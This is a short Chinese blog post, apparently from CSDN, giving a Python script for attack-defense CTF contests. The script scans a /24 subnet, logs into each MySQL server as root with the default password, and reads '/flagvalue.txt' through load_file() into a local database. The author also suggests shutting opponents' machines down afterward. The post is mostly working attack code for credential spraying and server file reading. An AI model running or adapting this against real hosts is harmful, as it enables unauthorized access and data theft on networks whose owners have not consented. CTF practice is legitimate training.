CTF比赛中使用Python通过Mysql漏洞获取FLAG
#!/usr/bin/env pythonimport MySQLdbdef Mysql_Inject(ip,flag):db = MySQLdb.connect("127.0.0.1","root","123456","python")cursor = db.cursor()try:query = "insert into py values(\"%s\",\"%s\");"%(ip,flag)
·
#!/usr/bin/env python
import MySQLdb
def Mysql_Inject(ip,flag):
db = MySQLdb.connect("127.0.0.1","root","123456","python")
cursor = db.cursor()
try:
query = "insert into py values(\"%s\",\"%s\");"%(ip,flag)
cursor.execute(query)
db.commit()
except:
print "save error!"
db.rollback()
db.close()
def MySQL_Connect(ip):
try:
db = MySQLdb.connect(ip,"root","root","mysql")
cursor = db.cursor()
except:
pass
try:
cursor.execute("select load_file('/flagvalue.txt');")
result = cursor.fetchall()
for row in result:
ip = ip
flag = result[0][0]
db.close()
Mysql_Inject(ip,flag)
print "get %s flag!"%ip
except:
pass
for i in range(1,254):
ip = '192.168.1.%s'%i
MySQL_Connect(ip)
这里也不能算是漏洞,算是批量扫描一下弱密码。
不过密码都不改那肯定是通过脚本批量拿了,拿完关机美滋滋,比赛中速度才是胜利的第一要义。
尽管metasploit中也有很多mysql爆破的脚本,但是可定制性太差,还是要自己写一套。
CSDN联合极客时间,共同打造面向开发者的精品内容学习社区,助力成长!
更多推荐
0
0- 0
已为社区贡献7条内容
所有评论(0)